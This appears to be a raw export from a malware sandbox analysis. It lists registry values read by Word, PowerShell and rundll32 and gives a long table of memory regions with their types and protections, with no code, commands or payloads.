C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F8B5E
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\system32\qagentrt.dll,-10
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\fveui.dll,-843
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\fveui.dll,-844
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\wuaueng.dll,-400
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
There are 336 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
250000
|
unkown
|
page execute and read and write
|
||
180000
|
unkown image
|
page execute and read and write
|
||
1E0000
|
unkown image
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
280000
|
unkown image
|
page execute and read and write
|
||
400000
|
unkown image
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
3B0000
|
unkown
|
page execute and read and write
|
||
280000
|
unkown
|
page execute and read and write
|
||
160000
|
unkown
|
page execute and read and write
|
||
400000
|
unkown image
|
page execute and read and write
|
||
2B0000
|
unkown
|
page execute and read and write
|
||
2C0000
|
unkown
|
page execute and read and write
|
||
400000
|
unkown image
|
page execute and read and write
|
||
340000
|
unkown
|
page execute and read and write
|
||
750000
|
unkown
|
page execute and read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
550000
|
unkown
|
page execute and read and write
|
||
2010000
|
unkown image
|
page execute and read and write
|
||
6E0000
|
unkown
|
page execute and read and write
|
||
4A0000
|
unkown
|
page execute and read and write
|
||
2B0000
|
unkown image
|
page execute and read and write
|
||
450000
|
unkown image
|
page execute and read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
400000
|
unkown image
|
page execute and read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
460000
|
unkown image
|
page execute and read and write
|
||
750000
|
unkown image
|
page execute and read and write
|
||
160000
|
unkown
|
page execute and read and write
|
||
270000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
930000
|
unkown
|
page execute and read and write
|
||
280000
|
unkown
|
page execute and read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
400000
|
unkown image
|
page execute and read and write
|
||
1B0000
|
unkown image
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
430000
|
unkown image
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
280000
|
unkown
|
page execute and read and write
|
||
250000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
270000
|
unkown
|
page execute and read and write
|
||
400000
|
unkown image
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
6B0000
|
unkown image
|
page execute and read and write
|
||
2F0000
|
unkown image
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
F64000
|
heap private
|
page read and write
|
||
4C4000
|
heap default
|
page read and write
|
||
720000
|
unkown
|
page readonly
|
||
3A7000
|
heap default
|
page read and write
|
||
7FF0003A000
|
unkown
|
page execute and read and write
|
||
357000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
291E000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
350000
|
heap private
|
page read and write
|
||
269E000
|
stack
|
page read and write
|
||
2FCE000
|
unkown
|
page read and write
|
||
2FF8000
|
unkown
|
page read and write
|
||
80000
|
unkown
|
page write copy
|
||
3C0000
|
unkown
|
page readonly
|
||
620000
|
unkown
|
page read and write
|
||
2C7D000
|
unkown
|
page read and write
|
||
21A0000
|
unkown
|
page read and write
|
||
52D000
|
heap default
|
page read and write
|
||
5D0000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page readonly
|
||
510000
|
unkown
|
page readonly
|
||
1D01F000
|
unkown
|
page read and write
|
||
1A3000
|
unkown image
|
page execute read
|
||
23D0000
|
unkown
|
page readonly
|
||
1F82000
|
unkown
|
page read and write
|
||
4BA000
|
unkown image
|
page readonly
|
||
9B0000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
1CFD8000
|
unkown
|
page read and write
|
||
290D000
|
stack
|
page read and write
|
||
2474000
|
heap private
|
page read and write
|
||
3604000
|
unkown
|
page read and write
|
||
31F6000
|
unkown
|
page read and write
|
||
740000
|
unkown
|
page readonly
|
||
400000
|
unkown image
|
page readonly
|
||
1D025000
|
unkown
|
page read and write
|
||
63D000
|
heap default
|
page read and write
|
||
1D025000
|
unkown
|
page read and write
|
||
12CC5000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
2F05000
|
unkown
|
page read and write
|
||
29B0000
|
heap private
|
page read and write
|
||
370000
|
heap default
|
page read and write
|
||
1F50000
|
unkown
|
page readonly
|
||
465000
|
unkown image
|
page write copy
|
||
BA000
|
stack
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
7F0000
|
unkown
|
page readonly
|
||
670000
|
unkown
|
page readonly
|
||
140000
|
unkown
|
page read and write
|
||
472000
|
unkown image
|
page execute and read and write
|
||
7FF00270000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page read and write
|
||
28E0000
|
unkown
|
page readonly
|
||
2A20000
|
unkown
|
page readonly
|
||
182000
|
heap default
|
page read and write
|
||
770000
|
heap private
|
page read and write
|
||
11B000
|
unkown
|
page read and write
|
||
514000
|
heap default
|
page read and write
|
||
390000
|
unkown
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
2F0000
|
unkown
|
page readonly
|
||
2D8C000
|
unkown
|
page read and write
|
||
35E5000
|
unkown
|
page read and write
|
||
540000
|
unkown
|
page readonly
|
||
120000
|
unkown
|
page readonly
|
||
3083000
|
unkown
|
page read and write
|
||
210000
|
heap private
|
page read and write
|
||
2FFC000
|
unkown
|
page read and write
|
||
1D0BF000
|
unkown
|
page read and write
|
||
2EF7000
|
unkown
|
page read and write
|
||
540000
|
heap private
|
page read and write
|
||
7DE000
|
unkown
|
page read and write
|
||
3611000
|
unkown
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
790000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page read and write
|
||
27B0000
|
heap private
|
page read and write
|
||
1D60000
|
unkown
|
page write copy
|
||
100000
|
unkown
|
page write copy
|
||
90000
|
unkown
|
page readonly
|
||
340B000
|
unkown
|
page read and write
|
||
22A2000
|
heap private
|
page read and write
|
||
5C0000
|
unkown
|
page readonly
|
||
58D000
|
heap default
|
page read and write
|
||
306D000
|
unkown
|
page read and write
|
||
1E40000
|
heap private
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
2FD0000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
650000
|
unkown
|
page readonly
|
||
190000
|
unkown
|
page read and write
|
||
430000
|
heap private
|
page read and write
|
||
257000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
36E2000
|
unkown
|
page read and write
|
||
318000
|
unkown image
|
page write copy
|
||
254E000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
7FF00207000
|
unkown
|
page read and write
|
||
3B6A000
|
unkown
|
page read and write
|
||
620000
|
unkown
|
page readonly
|
||
178000
|
heap private
|
page read and write
|
||
7B4000
|
unkown image
|
page read and write
|
||
1B62D000
|
unkown
|
page read and write
|
||
2522000
|
heap private
|
page read and write
|
||
2E4000
|
unkown image
|
page read and write
|
||
1CFE9000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
234000
|
heap private
|
page read and write
|
||
2AE0000
|
unkown
|
page readonly
|
||
160000
|
unkown
|
page readonly
|
||
23C0000
|
unkown
|
page read and write
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
549000
|
heap default
|
page read and write
|
||
35FE000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page read and write
|
||
280000
|
unkown image
|
page readonly
|
||
1FA7000
|
unkown
|
page readonly
|
||
2AA000
|
stack
|
page read and write
|
||
291F000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
310000
|
unkown image
|
page execute and read and write
|
||
71A000
|
unkown image
|
page readonly
|
||
980000
|
unkown
|
page readonly
|
||
1FA7000
|
unkown
|
page readonly
|
||
22A2000
|
heap private
|
page read and write
|
||
21A0000
|
unkown
|
page read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
2F01000
|
unkown
|
page read and write
|
||
1D0000
|
heap default
|
page read and write
|
||
260000
|
unkown
|
page readonly
|
||
700000
|
heap private
|
page read and write
|
||
7B8000
|
unkown image
|
page write copy
|
||
7FF00105000
|
unkown
|
page read and write
|
||
3025000
|
unkown
|
page read and write
|
||
600000
|
heap private
|
page read and write
|
||
2AF0000
|
unkown
|
page read and write
|
||
2330000
|
unkown
|
page read and write
|
||
2080000
|
unkown
|
page readonly
|
||
710000
|
heap private
|
page read and write
|
||
1CFC9000
|
unkown
|
page read and write
|
||
494000
|
unkown image
|
page read and write
|
||
6D0000
|
unkown image
|
page execute and read and write
|
||
2450000
|
unkown
|
page readonly
|
||
4E0000
|
heap default
|
page read and write
|
||
422000
|
unkown image
|
page execute and read and write
|
||
9B0000
|
unkown
|
page readonly
|
||
2074000
|
unkown image
|
page read and write
|
||
2AC4000
|
unkown
|
page read and write
|
||
350000
|
heap private
|
page read and write
|
||
250E000
|
unkown
|
page read and write
|
||
1D043000
|
unkown
|
page read and write
|
||
2CB000
|
stack
|
page read and write
|
||
BC000
|
stack
|
page read and write
|
||
7FF001A0000
|
unkown
|
page read and write
|
||
313000
|
unkown image
|
page execute read
|
||
1CFEE000
|
unkown
|
page read and write
|
||
3210000
|
unkown
|
page read and write
|
||
1A2000
|
unkown image
|
page execute and read and write
|
||
D0000
|
unkown
|
page readonly
|
||
2DBE000
|
unkown
|
page read and write
|
||
3192000
|
unkown
|
page read and write
|
||
637000
|
heap default
|
page read and write
|
||
2B4000
|
heap default
|
page read and write
|
||
35EB000
|
unkown
|
page read and write
|
||
466000
|
unkown image
|
page read and write
|
||
2E60000
|
heap private
|
page read and write
|
||
5A4000
|
heap default
|
page read and write
|
||
1E10000
|
unkown
|
page readonly
|
||
1CF00000
|
heap private
|
page read and write
|
||
1D54000
|
heap private
|
page read and write
|
||
377000
|
heap default
|
page read and write
|
||
460000
|
unkown image
|
page readonly
|
||
28C000
|
unkown
|
page read and write
|
||
10C000
|
unkown
|
page read and write
|
||
279D000
|
stack
|
page read and write
|
||
30AF000
|
unkown
|
page read and write
|
||
28AD000
|
unkown
|
page read and write
|
||
772000
|
unkown image
|
page execute and read and write
|
||
5F4000
|
heap default
|
page read and write
|
||
718000
|
heap private
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
301E000
|
unkown
|
page read and write
|
||
280000
|
unkown
|
page execute and read and write
|
||
200000
|
unkown
|
page readonly
|
||
4D7000
|
heap default
|
page read and write
|
||
22E0000
|
heap private
|
page read and write
|
||
295E000
|
unkown
|
page read and write
|
||
25C000
|
unkown
|
page read and write
|
||
2284000
|
heap private
|
page read and write
|
||
7FF0010A000
|
unkown
|
page execute and read and write
|
||
1BD000
|
heap default
|
page read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
320F000
|
stack
|
page read and write
|
||
2F17000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
4E0000
|
unkown
|
page readonly
|
||
2EC000
|
stack
|
page read and write
|
||
2F00000
|
unkown
|
page readonly
|
||
2F68000
|
unkown
|
page read and write
|
||
2A1E000
|
stack
|
page read and write
|
||
27CC000
|
unkown
|
page readonly
|
||
160000
|
unkown
|
page readonly
|
||
2370000
|
heap private
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
2402000
|
heap private
|
page read and write
|
||
498000
|
unkown image
|
page write copy
|
||
1DC0000
|
unkown
|
page readonly
|
||
674000
|
heap private
|
page read and write
|
||
465000
|
unkown image
|
page write copy
|
||
5E0000
|
heap private
|
page read and write
|
||
289E000
|
stack
|
page read and write
|
||
2280000
|
heap private
|
page read and write
|
||
2E7D000
|
stack
|
page read and write
|
||
7FF00040000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
3547000
|
unkown
|
page read and write
|
||
270000
|
unkown
|
page readonly
|
||
2284000
|
heap private
|
page read and write
|
||
44A000
|
heap default
|
page read and write
|
||
3AD000
|
heap default
|
page read and write
|
||
2F0000
|
unkown
|
page read and write
|
||
260000
|
unkown
|
page read and write
|
||
2E6D000
|
stack
|
page read and write
|
||
9AE000
|
unkown
|
page read and write
|
||
21A0000
|
unkown
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
6A4000
|
heap private
|
page read and write
|
||
2960000
|
unkown
|
page readonly
|
||
B0000
|
unkown
|
page readonly
|
||
1F50000
|
unkown
|
page readonly
|
||
28D0000
|
heap private
|
page execute and read and write
|
||
2C0000
|
heap private
|
page read and write
|
||
397000
|
heap default
|
page read and write
|
||
465000
|
unkown image
|
page write copy
|
||
303C000
|
unkown
|
page read and write
|
||
4C4000
|
unkown image
|
page read and write
|
||
46A000
|
unkown image
|
page readonly
|
||
23CE000
|
stack
|
page read and write
|
||
860000
|
heap private
|
page read and write
|
||
B0000
|
unkown
|
page readonly
|
||
2F1E000
|
unkown
|
page read and write
|
||
1D133000
|
unkown
|
page read and write
|
||
21A0000
|
unkown
|
page readonly
|
||
27C2000
|
heap private
|
page read and write
|
||
4A0000
|
unkown
|
page readonly
|
||
7A0000
|
unkown
|
page readonly
|
||
220000
|
heap private
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
4C0000
|
unkown
|
page read and write
|
||
2280000
|
heap private
|
page read and write
|
||
450000
|
unkown
|
page readonly
|
||
454000
|
heap default
|
page read and write
|
||
1FA7000
|
unkown
|
page readonly
|
||
527000
|
heap default
|
page read and write
|
||
31AE000
|
stack
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
460000
|
unkown
|
page readonly
|
||
35BC000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
465000
|
unkown image
|
page write copy
|
||
423000
|
unkown image
|
page execute read
|
||
160000
|
unkown
|
page readonly
|
||
28C0000
|
unkown
|
page read and write
|
||
203000
|
heap default
|
page read and write
|
||
480000
|
unkown image
|
page execute and read and write
|
||
7FF00260000
|
unkown
|
page execute and read and write
|
||
464000
|
unkown image
|
page read and write
|
||
6B0000
|
unkown image
|
page readonly
|
||
2B6000
|
unkown
|
page read and write
|
||
2F7E000
|
stack
|
page read and write
|
||
5A7000
|
heap default
|
page read and write
|
||
7FF0004C000
|
unkown
|
page execute and read and write
|
||
3170000
|
heap private
|
page read and write
|
||
1A0000
|
unkown image
|
page execute and read and write
|
||
1CDBE000
|
unkown
|
page read and write
|
||
511000
|
heap default
|
page read and write
|
||
22E0000
|
heap private
|
page read and write
|
||
9F0000
|
heap private
|
page read and write
|
||
26B0000
|
unkown
|
page readonly
|
||
1CFED000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page readonly
|
||
D0000
|
unkown
|
page readonly
|
||
5EF000
|
heap default
|
page read and write
|
||
2EA000
|
unkown image
|
page readonly
|
||
28C0000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page execute and read and write
|
||
50D000
|
heap default
|
page read and write
|
||
35D8000
|
unkown
|
page read and write
|
||
575000
|
unkown
|
page read and write
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
770000
|
unkown image
|
page execute and read and write
|
||
476000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page read and write
|
||
70000
|
unkown
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
587000
|
heap default
|
page read and write
|
||
81F000
|
stack
|
page read and write
|
||
3F7000
|
heap default
|
page read and write
|
||
2310000
|
heap private
|
page read and write
|
||
9B000
|
unkown
|
page read and write
|
||
780000
|
heap private
|
page read and write
|
||
41D000
|
heap default
|
page read and write
|
||
490000
|
heap private
|
page read and write
|
||
600000
|
heap default
|
page read and write
|
||
200000
|
heap default
|
page read and write
|
||
21A0000
|
unkown
|
page read and write
|
||
22F0000
|
heap private
|
page read and write
|
||
520000
|
heap default
|
page read and write
|
||
2CD0000
|
unkown
|
page write copy
|
||
2FD4000
|
unkown
|
page read and write
|
||
468000
|
unkown image
|
page write copy
|
||
28BC000
|
unkown
|
page read and write
|
||
2B07000
|
heap private
|
page read and write
|
||
113000
|
heap default
|
page read and write
|
||
2032000
|
unkown image
|
page execute and read and write
|
||
2FEA000
|
unkown
|
page read and write
|
||
25C000
|
stack
|
page read and write
|
||
1D058000
|
unkown
|
page read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
510000
|
heap private
|
page read and write
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
280E000
|
unkown
|
page read and write
|
||
35A000
|
unkown image
|
page readonly
|
||
506000
|
heap default
|
page read and write
|
||
3682000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page readonly
|
||
240000
|
heap default
|
page read and write
|
||
27C7000
|
unkown
|
page readonly
|
||
404000
|
heap default
|
page read and write
|
||
266C000
|
unkown
|
page read and write
|
||
423000
|
unkown image
|
page execute read
|
||
DE0000
|
unkown
|
page readonly
|
||
160000
|
unkown
|
page readonly
|
||
574000
|
heap default
|
page read and write
|
||
2960000
|
unkown
|
page readonly
|
||
2830000
|
unkown
|
page read and write
|
||
BA7000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page read and write
|
||
A92000
|
heap default
|
page read and write
|
||
26C0000
|
heap private
|
page read and write
|
||
35CF000
|
unkown
|
page read and write
|
||
260000
|
heap private
|
page read and write
|
||
1BB70000
|
heap private
|
page read and write
|
||
2A4000
|
heap private
|
page read and write
|
||
2FF3000
|
unkown
|
page read and write
|
||
27D2000
|
heap private
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
3213000
|
unkown
|
page read and write
|
||
2A5F000
|
unkown
|
page read and write
|
||
1E00000
|
unkown
|
page readonly
|
||
470000
|
unkown image
|
page execute and read and write
|
||
340000
|
unkown
|
page readonly
|
||
28DE000
|
unkown
|
page read and write
|
||
2F0E000
|
stack
|
page read and write
|
||
7FF001D0000
|
unkown
|
page execute and read and write
|
||
6C2000
|
heap private
|
page read and write
|
||
2FED000
|
unkown
|
page read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
2000000
|
heap private
|
page read and write
|
||
1CC000
|
unkown
|
page read and write
|
||
7F0000
|
unkown
|
page readonly
|
||
42C000
|
unkown
|
page read and write
|
||
2C2000
|
unkown
|
page read and write
|
||
549000
|
heap default
|
page read and write
|
||
39D000
|
heap default
|
page read and write
|
||
2480000
|
unkown
|
page readonly
|
||
7FF00280000
|
unkown
|
page read and write
|
||
2FC0000
|
unkown
|
page read and write
|
||
218000
|
unkown image
|
page write copy
|
||
7FF000F0000
|
unkown
|
page read and write
|
||
A8A000
|
heap default
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
24C000
|
unkown
|
page read and write
|
||
464000
|
unkown image
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
1B920000
|
unkown
|
page read and write
|
||
474000
|
unkown
|
page read and write
|
||
3003000
|
unkown
|
page read and write
|
||
2EA000
|
stack
|
page read and write
|
||
23E0000
|
unkown
|
page readonly
|
||
7D0000
|
unkown
|
page readonly
|
||
420000
|
unkown image
|
page execute and read and write
|
||
248000
|
unkown image
|
page write copy
|
||
21A000
|
unkown image
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
3064000
|
unkown
|
page read and write
|
||
7FF00042000
|
unkown
|
page execute and read and write
|
||
220000
|
unkown
|
page readonly
|
||
367000
|
heap default
|
page read and write
|
||
110000
|
unkown
|
page readonly
|
||
1CFD4000
|
unkown
|
page read and write
|
||
423000
|
unkown image
|
page execute read
|
||
1FF0000
|
unkown
|
page readonly
|
||
2D0000
|
unkown
|
page readonly
|
||
46A000
|
unkown image
|
page readonly
|
||
1CC1E000
|
unkown
|
page read and write
|
||
297000
|
heap default
|
page read and write
|
||
1CFFD000
|
unkown
|
page read and write
|
||
26E0000
|
unkown
|
page readonly
|
||
864000
|
heap private
|
page read and write
|
||
350000
|
heap default
|
page read and write
|
||
1EFD000
|
unkown
|
page read and write
|
||
423000
|
unkown image
|
page execute read
|
||
7C0000
|
heap private
|
page read and write
|
||
3E0000
|
heap default
|
page read and write
|
||
465000
|
unkown image
|
page write copy
|
||
1CF9B000
|
unkown
|
page read and write
|
||
714000
|
unkown image
|
page read and write
|
||
380000
|
heap default
|
page read and write
|
||
466000
|
unkown image
|
page read and write
|
||
300D000
|
unkown
|
page read and write
|
||
9B0000
|
heap private
|
page read and write
|
||
730000
|
unkown
|
page readonly
|
||
316E000
|
unkown
|
page read and write
|
||
1C860000
|
heap private
|
page read and write
|
||
1CAEE000
|
unkown
|
page read and write
|
||
2614000
|
heap private
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
4C0000
|
heap private
|
page read and write
|
||
7FF001C0000
|
unkown
|
page read and write
|
||
35C5000
|
unkown
|
page read and write
|
||
22B0000
|
unkown
|
page readonly
|
||
2420000
|
unkown
|
page readonly
|
||
252000
|
heap private
|
page read and write
|
||
3A86000
|
unkown
|
page read and write
|
||
2440000
|
heap private
|
page read and write
|
||
2AC0000
|
unkown
|
page read and write
|
||
2330000
|
heap private
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
20000
|
heap private
|
page read and write
|
||
A57000
|
heap default
|
page read and write
|
||
2280000
|
unkown
|
page read and write
|
||
2A0000
|
unkown image
|
page execute and read and write
|
||
417000
|
heap default
|
page read and write
|
||
23D0000
|
unkown
|
page readonly
|
||
249E000
|
unkown
|
page read and write
|
||
2380000
|
unkown
|
page readonly
|
||
2D0000
|
unkown image
|
page execute and read and write
|
||
29DE000
|
unkown
|
page read and write
|
||
320000
|
heap default
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
340000
|
heap private
|
page read and write
|
||
310000
|
unkown
|
page readonly
|
||
1D3000
|
unkown image
|
page execute read
|
||
20000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
4A7000
|
heap default
|
page read and write
|
||
468000
|
unkown image
|
page write copy
|
||
2F43000
|
unkown
|
page read and write
|
||
28DF000
|
stack
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
950000
|
heap private
|
page read and write
|
||
468000
|
unkown image
|
page write copy
|
||
3073000
|
unkown
|
page read and write
|
||
4D0000
|
heap default
|
page read and write
|
||
4F7000
|
heap default
|
page read and write
|
||
27E0000
|
unkown
|
page readonly
|
||
1FA7000
|
unkown
|
page readonly
|
||
2D3000
|
unkown image
|
page execute read
|
||
420000
|
unkown image
|
page execute and read and write
|
||
2300000
|
unkown
|
page readonly
|
||
1FE0000
|
unkown
|
page readonly
|
||
D0000
|
unkown
|
page read and write
|
||
7F0000
|
unkown
|
page readonly
|
||
387000
|
heap default
|
page read and write
|
||
1CF91000
|
unkown
|
page read and write
|
||
278000
|
heap private
|
page read and write
|
||
464000
|
unkown image
|
page read and write
|
||
430000
|
heap private
|
page read and write
|
||
430000
|
unkown image
|
page readonly
|
||
1D06A000
|
unkown
|
page read and write
|
||
35BF000
|
unkown
|
page read and write
|
||
2FC4000
|
unkown
|
page read and write
|
||
968000
|
heap private
|
page read and write
|
||
2D8E000
|
unkown
|
page read and write
|
||
2D1F000
|
unkown
|
page read and write
|
||
9C0000
|
unkown
|
page readonly
|
||
2E0E000
|
unkown
|
page read and write
|
||
718000
|
unkown image
|
page write copy
|
||
23E0000
|
unkown
|
page readonly
|
||
3173000
|
unkown
|
page read and write
|
||
950000
|
unkown
|
page readonly
|
||
2350000
|
heap private
|
page read and write
|
||
3042000
|
unkown
|
page read and write
|
||
28E000
|
heap default
|
page read and write
|
||
2EBE000
|
unkown
|
page read and write
|
||
302D000
|
stack
|
page read and write
|
||
3011000
|
unkown
|
page read and write
|
||
690000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
A44000
|
heap default
|
page read and write
|
||
1CA000
|
stack
|
page read and write
|
||
340000
|
heap default
|
page read and write
|
||
2F27000
|
unkown
|
page read and write
|
||
1CFE3000
|
unkown
|
page read and write
|
||
2F9E000
|
unkown
|
page read and write
|
||
23E4000
|
heap private
|
page read and write
|
||
624000
|
heap default
|
page read and write
|
||
830000
|
unkown
|
page readonly
|
||
25C0000
|
heap private
|
page read and write
|
||
100000
|
unkown
|
page readonly
|
||
3070000
|
unkown
|
page read and write
|
||
570000
|
heap default
|
page read and write
|
||
242E000
|
unkown
|
page read and write
|
||
FC000
|
unkown
|
page read and write
|
||
2DBE000
|
stack
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
430000
|
unkown image
|
page readonly
|
||
453000
|
unkown image
|
page execute read
|
||
20000
|
unkown
|
page readonly
|
||
1D0000
|
unkown image
|
page execute and read and write
|
||
12F72000
|
unkown
|
page read and write
|
||
1A0000
|
heap private
|
page read and write
|
||
2AF0000
|
unkown
|
page read and write
|
||
1FA7000
|
unkown
|
page readonly
|
